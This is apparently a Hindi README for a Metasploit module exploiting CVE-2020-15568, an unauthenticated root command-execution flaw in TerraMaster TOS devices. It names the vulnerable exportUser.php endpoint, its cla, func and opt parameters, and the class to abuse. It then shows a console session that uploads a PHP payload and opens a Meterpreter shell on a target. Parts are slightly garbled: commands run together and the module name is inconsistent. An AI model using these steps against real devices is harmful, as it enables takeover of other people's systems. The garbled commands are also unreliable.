
CVE-2020-15568 Metasploit मॉड्यूल के लिए रिपॉज़िटरी
CVE-2020-15568 मेटास्प्लॉइट मॉड्यूल के लिए रिपॉजिटरी
include/exportUser.php फ़ाइल में डायनामिक क्लास विधि आमंत्रण (dynamic class method invocation) भेद्यता मौजूद है, जो TerraMaster डिवाइसों पर रूट विशेषाधिकारों के साथ रिमोट कमांड निष्पादित करने की अनुमति देती है। इस भेद्यता का शोषण करने और विधि को कॉल करने के लिए, संवेदनशील फ़ाइल को कई HTTP GET पैरामीटर प्रदान करने की आवश्यकता होती है। पहली पंक्ति में एप्लिकेशन app.php को शामिल करता है, जो TOS सॉफ्टवेयर के प्रासंगिक कोर क्लासेस को स्वतः लोड करता है। एप्लिकेशन GET पैरामीटर type के मान के आधार पर कार्यवाही निर्धारित करता है। यदि type चर का मान 1 या 2 से भिन्न है, तो संवेदनशील कोड तक पहुँचना संभव है। exportUser.php के स्रोत कोड के अनुसार, एप्लिकेशन को HTTP GET पैरामीटर cla (class का संक्षिप्त रूप), func और opt की आवश्यकता होती है।
अन्य फाइलों की कोड समीक्षा के दौरान भी, यह पाया गया है कि TOS सॉफ्टवेयर में पहले से मौजूद क्लासेस का उपयोग करके इस समस्या का शोषण करने का एक तरीका है। include/class/application.class.php में स्थित PHP क्लास, TOS सॉफ्टवेयर चलाने वाले डिवाइसों पर कमांड निष्पादित करने के लिए सबसे उपयुक्त उम्मीदवार है। चूँकि exportUser.php में कोई प्रमाणीकरण नियंत्रण नहीं है, एक अनधिकृत (unauthenticated) हमलावर के लिए कोड निष्पादन तक पहुँचना संभव है।
use exploit/multi/http/terramaster_command_execset rhost 192.168.1.27check[+] 192.168.1.27:80 - The target is vulnerable.
Exploit targets:
Id Name
-- ----
0 Auto
msf5 > use exploit/multi/http/terra_master_command_exec
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >